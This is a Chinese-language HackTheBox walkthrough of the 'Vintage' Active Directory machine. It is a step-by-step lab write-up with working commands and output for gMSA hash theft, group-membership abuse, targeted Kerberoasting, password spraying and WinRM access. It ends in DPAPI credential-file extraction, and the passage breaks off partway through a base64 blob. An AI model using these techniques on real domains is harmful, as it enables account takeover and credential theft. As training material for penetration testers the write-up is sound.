Vintage
Machine Information
As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
1. 立足点&user
1.1. 信息收集
1.1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/htb]
└─# nmap 10.10.11.45 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-05 09:38 EDT
Nmap scan report for 10.10.11.45
Host is up (0.32s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
51868/tcp open unknown
51873/tcp open unknown
51896/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 29.92 seconds
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# nmap vintage.htb -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-05 13:22:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-05T13:23:41
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -24m06s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 174.20 seconds
1.1.2. 初始凭证
校验一下,给的入口凭证
禁用了NTLM认证,这里可以使用kerberos认证。
先拿个票据,方便后面操作
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-getTGT 'vintage.htb/P.Rosa:Rosaisbest123' -dc-ip 10.10.11.45
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in P.Rosa.ccache
1.1.3. smb
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# nxc smb dc01.vintage.htb -k --use-kcache --shares
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] VINTAGE.HTB\P.Rosa from ccache
SMB dc01.vintage.htb 445 dc01 [*] Enumerated shares
SMB dc01.vintage.htb 445 dc01 Share Permissions Remark
SMB dc01.vintage.htb 445 dc01 ----- ----------- ------
SMB dc01.vintage.htb 445 dc01 ADMIN$ Remote Admin
SMB dc01.vintage.htb 445 dc01 C$ Default share
SMB dc01.vintage.htb 445 dc01 IPC$ READ Remote IPC
SMB dc01.vintage.htb 445 dc01 NETLOGON READ Logon server share
SMB dc01.vintage.htb 445 dc01 SYSVOL READ Logon server share
多半都没什么东西
1.1.4. user
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# nxc smb dc01.vintage.htb -k --use-kcache --users
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] VINTAGE.HTB\P.Rosa from ccache
SMB dc01.vintage.htb 445 dc01 -Username- -Last PW Set- -BadPW- -Description-
SMB dc01.vintage.htb 445 dc01 Administrator 2024-06-08 11:34:54 0 Built-in account for administering the computer/domain
SMB dc01.vintage.htb 445 dc01 Guest 2024-11-13 14:16:53 0 Built-in account for guest access to the computer/domain
SMB dc01.vintage.htb 445 dc01 krbtgt 2024-06-05 10:27:35 0 Key Distribution Center Service Account
SMB dc01.vintage.htb 445 dc01 M.Rossi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 R.Verdi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 L.Bianchi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 G.Viola 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 C.Neri 2024-06-05 21:08:13 0
SMB dc01.vintage.htb 445 dc01 P.Rosa 2024-11-06 12:27:16 0
SMB dc01.vintage.htb 445 dc01 svc_sql 2025-08-05 13:52:03 0
SMB dc01.vintage.htb 445 dc01 svc_ldap 2024-06-06 13:45:27 0
SMB dc01.vintage.htb 445 dc01 svc_ark 2024-06-06 13:45:27 0
SMB dc01.vintage.htb 445 dc01 C.Neri_adm 2024-06-07 10:54:14 0
SMB dc01.vintage.htb 445 dc01 L.Bianchi_adm 2025-08-05 13:12:19 0
SMB dc01.vintage.htb 445 dc01 [*] Enumerated 14 local users: VINTAGE
1.1.5. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# rusthound-ce --domain vintage.htb -u P.Rosa -p Rosaisbest123 -c All --zip
---------------------------------------------------
Initializing RustHound-CE at 10:06:56 on 08/05/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-08-05T14:06:56Z INFO rusthound_ce] Verbosity level: Info
[2025-08-05T14:06:56Z INFO rusthound_ce] Collection method: All
[2025-08-05T14:06:56Z INFO rusthound_ce::ldap] Connected to VINTAGE.HTB Active Directory!
[2025-08-05T14:06:56Z INFO rusthound_ce::ldap] Starting data collection...
[2025-08-05T14:06:56Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-05T14:06:59Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=vintage,DC=htb
[2025-08-05T14:06:59Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-05T14:07:02Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=vintage,DC=htb
[2025-08-05T14:07:02Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-05T14:07:06Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=vintage,DC=htb
[2025-08-05T14:07:06Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-05T14:07:06Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=vintage,DC=htb
[2025-08-05T14:07:06Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-05T14:07:07Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=vintage,DC=htb
[2025-08-05T14:07:07Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-08-05T14:07:07Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-08-05T14:07:07Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] 16 users parsed!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] 66 groups parsed!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] 2 computers parsed!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] 2 ous parsed!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] 73 containers parsed!
[2025-08-05T14:07:07Z INFO rusthound_ce::json::maker::common] .//20250805100707_vintage-htb_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 10:07:07 on 08/05/25! Happy Graphing!
当前用户没有任何的出站访问控制
而且你使用 bloodyAD 查看也没有什么可以利用的写入权限
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# bloodyAD --host dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=vintage,DC=htb
permission: WRITE
distinguishedName: CN=P.Rosa,CN=Users,DC=vintage,DC=htb
permission: WRITE
1.1.6. PRE-WINDOWS 2000 COMPATIBLE ACCESS
但是有趣的是,你会发现一个机器用户 FS01$ 他是 PRE-WINDOWS 2000 COMPATIBLE ACCESS 组的成员
- [MS-ADTS]: Pre-Windows 2000 Compatible Access Group Object | Microsoft Learn
即,这台机器属于一个Winodws 2000之前的版本,通常这个版本的计算机密码都是全小写的计算机名(不带$)
Info
在 Windows NT 4.0 和更早期的 Windows 域(NTLM 环境) 中:
- 计算机账户(Computer Account) 在加入域时,会自动创建一个对应的账户名(如:
COMPUTERNAME$)。 - 计算机账户的默认密码策略非常简单:
- 默认密码是计算机名的小写版本(去掉
$符号)。
而且你还可以发现它继承有 ReadGMSAPassword 权限
无论如何,这个 FS01 计算机用户都是一个值得尝试的目标
bingo!
果然如此。
1.2. ReadGMSAPassword
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# nxc ldap dc01.vintage.htb -u fs01$ -p fs01 -k --gmsa
LDAP dc01.vintage.htb 389 DC01 [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP dc01.vintage.htb 389 DC01 [+] vintage.htb\fs01$:fs01
LDAP dc01.vintage.htb 389 DC01 [*] Getting GMSA Passwords
LDAP dc01.vintage.htb 389 DC01 Account: gMSA01$ `NTLM: 720508f33e5c631765b6f94f89dcc9df` PrincipalsAllowedToReadPassword: Domain Computers
获取到 gMSA01$ 机器的 哈希
还是先获取一个票据
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-getTGT 'vintage.htb/gMSA01$' -dc-ip 10.10.11.45 -hashes :720508f33e5c631765b6f94f89dcc9df
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in gMSA01$.ccache
1.3. AddSelf
先看一下blood关于 GMSA01 的DACL,貌似只有一个GenericWrite
对于GenericWrite来说,打法:
- 影子凭证(要求域控有自己的密钥对 如有CA AD-CS的情况下)
- Targeted Kerberoasting
因为这台机器没有密钥对,所以我只能尝试 Targeted Kerberoasting,但是报错了,(后面我查看0xdf的博客,发现它也遇到了这样的问题,但是可以通过 --dc-host 来解决)
这里不管是使用 -k 还是用 哈希都会报错。
即使解决后,这个用户还是无法获取到什么成果
我看一下当前机器用户有什么写入的权限
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# bloodyAD --host dc01.vintage.htb -d vintage.htb -k get writable
distinguishedName: CN=TPM Devices,DC=vintage,DC=htb
`permission: CREATE_CHILD`
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=vintage,DC=htb
permission: WRITE
distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
permission: WRITE
distinguishedName: CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb
permission: WRITE
CREATE_CHILD 说明我对 TPM Devices 对象具有创建子对象的权限
其从bloodhound也可以看到(这里要用bloodhound-python 进行收集,我用的rusthound-ce就没显示出来)
rusthound-ce --domain vintage.htb -f dc01.vintage.htb -u gMSA01$ -c All --zip -k
把 gMSA01$ 加到组里面,就可以控制着三个账号了
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember SERVICEMANAGERS gMSA01$
[+] gMSA01$ added to SERVICEMANAGERS
然后申请一下TGT,
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# impacket-getTGT 'vintage.htb/gmsa01$' -dc-ip 10.10.11.45 -hashes :720508f33e5c631765b6f94f89dcc9df
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in gmsa01$.ccache
因为我们当前用户 gmsa01$ 被加入了 SERVICEMANAGERS 组,
所以对这三个用户有 GenericAll 的权限。那么我们可以改密码,也可以尝试进行 Targeted Kerberoasting 获取hash,然后爆破获取当前密码。
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# targetedKerberoast.py -d vintage.htb -k --no-pass --dc-host dc01.vintage.htb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (svc_ldap)
$krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb/svc_ldap*$058e6aba6e97c8ac73e4832cd0cfafe0$40aaf13049b9f1eae0e8c307295940da36aa58adb1b0a669a4c725d9d65ddff4d6bbb28a6d00efd48730f868553a631dd1fa754d45baa4417cd8880504f00a5fea688569564e6254042573eec1915a80627e5ee03176d37cfd1399a7acbad555c63bb9b26c8bb8e4d6e393b625a28cb21482b3df18a606e911cdc7accff6ab198174505ee65dcb300136a8673e71f65e046113a64deafaeb62558f8a8591e1214d3baa2f01cd7818c94b63074e9a4dd516a6aab99142434e13fe9d3d673ac4e1ae2c8f49adbbadd9e755151d6fda73f67ed0db6a837799b526bd88ae3e059df1ddd136af3bc585b047c14efd893eb1ebdd3b1b842e6a0ba25e27df2cdc52bcaac25f5b4b863a0206bddc918a0c462be3a7f91e8d846d69096399ae9bc0b72e4cbc4e7a8f9cb20d3bf983b8f58e04f1bbe7b1b4026f2fcd13dc61df9ca48eb1778f9c3388d6853e4cf892ea3a83b8038215f9d1f43ef631c0b06d7c0948b302e60a9e7f2090a6f1200c8ddd7742ca6e2f5f4edaae93eaed5d5ee45f9b3e61532a60de2ba2925a80cfe76974ddab78b631b8a86ce44fe170c6883020606d4f87faf90eb7ab681d93844da2d07c1af5e539630a79f36fc288212556bd3bead95f478a44ed2e1087fc54a7a5303bfbf9013f7169d8a804244b0b826993499155c414fa0abfbcd6d8cbc1c6fcd378a2803dd9f03351636cbc77462b16a65da3a350586b1e6be34febf1f73670847e37be095f82f3054c69d1495c3c42e726eddb7014c28486aa7e33278606991ceb924d8376da21cd02d8e64f5e9aa5adf8da35d8c76a8ee238ccaae8efc34878f427f65a09589f884f593b2915cb8251d2ea2a6c915823d00c25bf33bfc53c92afbb6c290a506d0a1213427b31e1eee9b5494ffbe25ce51d8ee434aa613ed9a02946e43b0257c7382a336cba2efceeba3c390a5ad2453a88b9fa5876a9bff09dc42b27ce7e51b7a522b527fb275ee124d1f405f81617f59053feda6791c49c6547137c523032b70bdb5f7772533c4a1b9d7f44cc56fd6233e73c9bdd6a22d4e1577655df146497da3582b2992f30ce2eb911739369cf698b5275b685d52692a78c32d5955cccf02427c8646745f8fd0519c6408fd6442529a83f8538f88d6544dab1d0a3694f5890e13dbe17798495f09ff1ef82f5b3dd91f0df3afcc11cc996af5656310588c301f3fa36fac9ac3e906e22bfc396bddee8edfaca5f9347711ca4f8f3e213125a2b8bf1ba5333f6e579135de77181ad30aa6776aaeecc6659b865c6865faba71514ed9170943e8d2d3193068f133a567b41a79a4aab3a020e2e33a6fb36aacb9a00ac87888ebc2c3f62b565a2b13791d49aef40c648deec6616660ed64a9bd891d9d52e07fe2066e96ebf7eda3249d5c7a7680704b573e96313a90d4cff2e464942b481199add0dfb32333ac04cf0d3339a
[+] Printing hash for (svc_ark)
$krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb/svc_ark*$f467d58e8356886152a6a6c26678bbba$db42a6cc94bcd91618c947f4ba85631270f2f2ce7ca3998f1b957608cfa2eacf09a0d678928c54a4944810230cb49a992fbe6c95e254bea0885e7efdf43ad45c410958f73ae2d22d5c322c1f59ff754ce48d096c81e67c01c7084c66cf3fe078cb0978f6b879613dca469d51f7aa1504769fac54bba9b415662a0f107deb1f871fb493660634211c9bdec25dfff8bf921d00a45557213ee0ec2d2dc8132b518d1db43c8831ce259e08cd67c92736bac00d7a576ff1302e48b763d97a92a7b93e7ee93c8f2bfbc1b6c5cd67b11651d7eee4eeb85291264ee783147f1b1804bbeefa76755ed4c0d97be9adc98264df9d150e9c0ef29db5054a46e360e4bef8899619afefecb479a6bcc394109f7a4bfabe72bf5a538de086ce734656e7068580086213d192ff17e0efb33db2f726a8d86830b564b2b33aac7054c83d53448008218be468e5dc7ce877687c5a3e8afe787226faf6fd8ee07a35df1bd765c45be2ca2d2a6bb3a4ce60f51c37a05178723e02269d747371e83152ad597193c0a0044c117825339b78ab5a8115bc3b8bfebad803150474da0ac2e24379956dfb5d9eb0408ce0f8c0c1f780640ed715485ccb66f7c1345a1969021ba188f6a34ea9dc5a0157308bebfe000d26d418af928d3c4116d960ad80a492baf5df7542f11c5a259f4273ce92fb11ebaf25845a476182b1d881afff7694533fda72d4c8aa12aa596b6321049b2f891bdfa184f2548854444d7f5b52fff8ba94883b15b6e95e3caca5f35a16483c95e6b4058a7051f9fe37fded834ddaf84184394ead7ebf08e2b2fc243f293ac29a65f44615207d056f9d114e7d5dc451d2fac41b212c78a4e33ed9719d341bdebb3996584d071c5eb1b7d6ddd5551ed385f1c70c506009b090cbf1a54dba9f69ecf12bbe53b1d707fb23663914d62098e020026935b85927ed50741d6dc35d5a497e49deec03edf98ea506f76d5ac6f64f2b7294f961f2164383253938fba74403c20bbfdbf32261e97fb19f0cf5420028e8f6e64e56f5eeabec0723eb27aff1208f2821159d64b6129b945ffc82609d757a59bffa63103f2e326fc6ec23e75f9bce9fdda39eec8155ab69692123ed1d818699a3efda5b6ac5d5abed77ba6f674d6311c026628e5985c0f95a863f678cb9b88e4de477704e8ea8bb3b11d708613216d979e2aa94e1e16f1d588e4334c09b5813f208b00c3daee2af1a1e721ae7e96f90769d605a7aa660deb596411ca066a92871e776af936fe86490576ad326ef42b31c8b90df0f86793cb1b19c4fc551ce16c1806286b3a315297b42b19844be255e3f9a61a5aa52d9f6c075fc4be8db2af564e4ca8420ac141599c9fe5ff18a9dd9db4b46dca517aae944aa84a7fcaa7ad5b80a7e2a3e6ce64a00f9b71c2670a2c465032f6284f07c9c485032be6e549945b514cd4e129a82e82dfe
我发现少了一个用户 SVC_SQL 的哈希,
看了一下原来是账号被禁用了
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# bloodyAD --host 10.10.11.45 -d vintage.htb -k --dc-ip dc01.vintage.htb get object svc_sql |grep userAccountControl
userAccountControl: `ACCOUNTDISABLE`; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
恢复一下即可
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# bloodyAD --host 10.10.11.45 -d vintage.htb -k --dc-ip dc01.vintage.htb remove uac svc_sql -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from svc_sql''s userAccountControl
#验证一下
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# bloodyAD --host 10.10.11.45 -d vintage.htb -k --dc-ip dc01.vintage.htb get object svc_sql |grep userAccountControl
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
然后在做一次 targetedkerberoast
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# targetedKerberoast.py -d vintage.htb -k --no-pass --dc-host dc01.vintage.htb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (svc_sql)
$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$cdc5a37a1ca9e8842a94df3b01c536c7$7618851f37f28f01f884b25b5c13656efdfe8909bb0a9ebe22904d838f4be3fa640396da1042efd158fead5fab64bf900d431af0edf155fff6ee3c0f3291c5db370df53a77a916748d0f8f926151ed67f0efab5497989a80f265ebc448ee35df6c88904b8b28c5330ff06affe7432a55c79a1064b30512d414eb9ce9a6872da4c12edecebac09876aff0ce1b63f16ac3d010fb888f1f236e066bf57fdaea0919107b70a3b47a137989136a2fc8b21423024a01d2b7ee41d7878014beae60a719cccc2dfe80b0fe00865ad88e5c24aee8cc33c67783bb4065047d035e40f292ac2b50c1ac89e32aca9b0ee705f85cd295306c4e8ea16b2c8c5a186716d34b4fb9593117f71e0d9dae47fdf9c465acc47003ff3c44148e196b59bc8b0e003e953b89bbed4b4db810e93cedc2164910f56ff6c846abde7a8474e7ba9afcc364624d814b9fdd9c1acebf6bd19b8ca3f5ae88c896fd328ccbee9948006341d07eab661233b18a4ac169f0abbdfe2ceeac08f93b037226a41c6e33c6a2219405faec78fbdb6e582dcd4991704ccac1b06e18ea79eada7fe7a83e68a40a7f70835d6f6ac819d7d1d7f81348f3dfb5b6b01d177febb6781b3cd0fa89c8483c7c060d53c83814909b2770cb6c8edfd62febb9b0d6a135468eb152038b47aca3f697fdc747bc7a5af9adfb750de145dc5ab8298ed099ec63cdbd7f0eb13ff2f0f40847d8a5955dee1f34323efbfc85685d5121dad2cefd0cec6537aec516066706d32e531c8b155919185a43cfae4d5b5127de4772bdd0ec976447b316a712c864af9021a070c0c2fa37ab4f28ffbf141a77da58e20ddf0ea7ceeec6cbbc4659df85dca3554be0c506b1047099a56a288e438940084c35b4abe8ad9b656d9f130bc8bf83acabc2d90d1fdb5bddf8eea9b9c9dfa27a715f344a08248a941bd0b615a91a27e5927f4e78c73c5160b8f9fddd2d02341eab757bbba6edb7788d586de21ed6586f9d894184a97d5a36919fb8bc80ad491291076d993f1bc3346a3c244b4773e2e64b6bf23a5cbba6775f4766906c28639ac77c4af5e38a0fa2c74e943ef513be9d4512bd2cb188cef44376174e06b3ef5d3d12c77b9e48065c495f4cfca067b2340255099cad8d32aca41332578962472b5653a188b988947ed313f372199ea7b45aae0c91fd709daa69650ba2dcb73ff5a3fa0e69ec85843b385cdb0c097753d9fd8c3644b0fcb49d5afd6b273019babc95e3f3e943b99885309286eae1873c1d2cae58f2fcb7c08b7ea217d51f717a2eb5b1060fb7b9168c3013381736fa432573751dc1adcd746176d24605f37abfc5e18119fd44e10c60340924152d7b9f53646956007815f6c5b86b482fc017c10aa7d1dd4da0b85b57ee61fa406ada2b9d82b03a7293ae608928af835530ac9cc9900c58681637e06253abd3c5d98f6ba529477d
成功获取到了三个用户的 $krb5tgs$23$ 哈希
hashcat 爆破
然后刚好可以爆破出 svc_sql 用户的密码 Zer0the0ne
看了下着三个用户,没有什么出站访问控制,那么下一步大概率就是做密码喷涂了
1.5. 密码喷涂
之前我有获取过域内的所有用户
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# nxc smb dc01.vintage.htb -k --use-kcache --users
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] VINTAGE.HTB\P.Rosa from ccache
SMB dc01.vintage.htb 445 dc01 -Username- -Last PW Set- -BadPW- -Description-
SMB dc01.vintage.htb 445 dc01 Administrator 2024-06-08 11:34:54 0 Built-in account for administering the computer/domain
SMB dc01.vintage.htb 445 dc01 Guest 2024-11-13 14:16:53 0 Built-in account for guest access to the computer/domain
SMB dc01.vintage.htb 445 dc01 krbtgt 2024-06-05 10:27:35 0 Key Distribution Center Service Account
SMB dc01.vintage.htb 445 dc01 M.Rossi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 R.Verdi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 L.Bianchi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 G.Viola 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 C.Neri 2024-06-05 21:08:13 0
SMB dc01.vintage.htb 445 dc01 P.Rosa 2024-11-06 12:27:16 0
SMB dc01.vintage.htb 445 dc01 svc_sql 2025-08-05 13:52:03 0
SMB dc01.vintage.htb 445 dc01 svc_ldap 2024-06-06 13:45:27 0
SMB dc01.vintage.htb 445 dc01 svc_ark 2024-06-06 13:45:27 0
SMB dc01.vintage.htb 445 dc01 C.Neri_adm 2024-06-07 10:54:14 0
SMB dc01.vintage.htb 445 dc01 L.Bianchi_adm 2025-08-05 13:12:19 0
SMB dc01.vintage.htb 445 dc01 [*] Enumerated 14 local users: VINTAGE
┌──(root㉿kali)-[~/Desktop/htb/vintage]
└─# nxc smb dc01.vintage.htb -u valid_user.txt -p Zer0the0ne -k --continue-on-success
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\Administrator:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\er/domain:Zer0the0ne KDC_ERR_C_PRINCIPAL_UNKNOWN
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\Guest:Zer0the0ne KDC_ERR_CLIENT_REVOKED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\uter/domain:Zer0the0ne KDC_ERR_C_PRINCIPAL_UNKNOWN
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\krbtgt:Zer0the0ne KDC_ERR_CLIENT_REVOKED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\M.Rossi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\R.Verdi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\L.Bianchi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\G.Viola:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\C.Neri:Zer0the0ne
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\P.Rosa:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\svc_sql:Zer0the0ne
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\svc_ldap:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\svc_ark:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\C.Neri_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\L.Bianchi_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
C.Neri 也是这个密码 同时也是远程管理组的成员
1.6. winrm
evil-winrm -i dc01.vintage.htb -r vintage.htb
2. root
通常我获取到一个winrmShell后,会上传Sharp4ADInformation.exe 来帮我收集一下信息
2.1. DPAPI
#主密钥
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
#blob
C:\Users\$USER\AppData\Local\Microsoft\Credentials\
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
这里下载会失败
但是你可以通过手动读取文件然后base64编码后复制到本地,绕过下载限制
先下载加密的blob
#*Evil-WinRM* PS C:\Users\C.Neri\AppData\Local\Microsoft\Credentials> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D"))
AQAAAAArAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAo0HPmVKl90yo16yi1vczmwAAACAwAAAATABvAGMAYQBsACAAQwByAGUAZABlAG4AdABpAGEAbAAgAEQAYQB0AGEADQAKAAAAA2YAAMAAAAAQAAAAWGwY9xmAmqE9qZdLaow3wAAAAAAEgAAAoAAAABAAAADAOtxnECNIHWCxyJsQmE5RSCoAAJ2hR2q5/Rb4IAs/cXSAxgb79Ut8dZk4ipmwx1m7dEe07qjaHzcyRjH/idYHh5ZQ74gh3V5Tu5J0fx/99N2nVpS00S42gqkt/eJwZXtsD2B+TgQQ4SXNQWiZQv7GcQDe6WCjk5Awe83t4aSEDYegCB5AfAklWyWCXs20J14TIb3NI2DeXyFDwjYgp8mBUCOoN05P0ggczcJxnJIVe0UubG71Lmnw9fA4sbOdg6pgtTJV9LylBCwxgdK0IlGoMeQbWIBnmNO2rH2JB5WmcAhQAMZWYSft+JwlTdVIvnf2Hhh3U+eFyG8VaYs0Es0aYoWG29jo+lvTsbDE3wZTgtL/IKw7fOYiB4bL6LtTg12LN5MIxmStRWSeY4XNB4ZkswBlBY8pBVr+mYzcmxCmziDM/8Khhaaa4dPT/aEqd0+FNm4F2TxJgY4Mo6N31INO0E4ChGDzyI2ialGGvAG4CwjRBN+Gpzhx91LJdv9REiRAVJtT0o4M71iqyn6Gh/P13AvOmS/TTevYZc0rfYwh10hHbsJE8nWVTlbMA8w6ZWtQiIVHdQLptkcDdLVdoghNa+IZFQkqzDpXur9BLLk9Z9V0Wubu98ED6ARHEl85BNRNzPBXF4W4UcC/zphnzaQ6IOGDEgkg2lWfwHDnf8A0M5eG67ZQPTB2F3ecWwVOOZ4gmOs2/xeH67jiadmlcwYQ3wuiPO7mLsF3qlDiaPVdMx4SKUhzmPRg5hU3CbyH/lBwiq3MEJYnnynQR+XvcZwQcIgwFW3bEGZubOXta40plwZLc+gkaJFU1DBg4ONdM0GT4K5IPT72SAFMGZmb5YmAJgR0jAb8WkrmR/gEv11RMYw/U+w0a+BncEMyOKNmg7Uei7X8CDFZO8Y2lcRUs9YzIuxFBw1QyphHhbJM57on3cOjojGKCjQuHyCMSKkCB/XRIqs0ccQ+uY9OtmPX3K02X8puVGcs/DGQ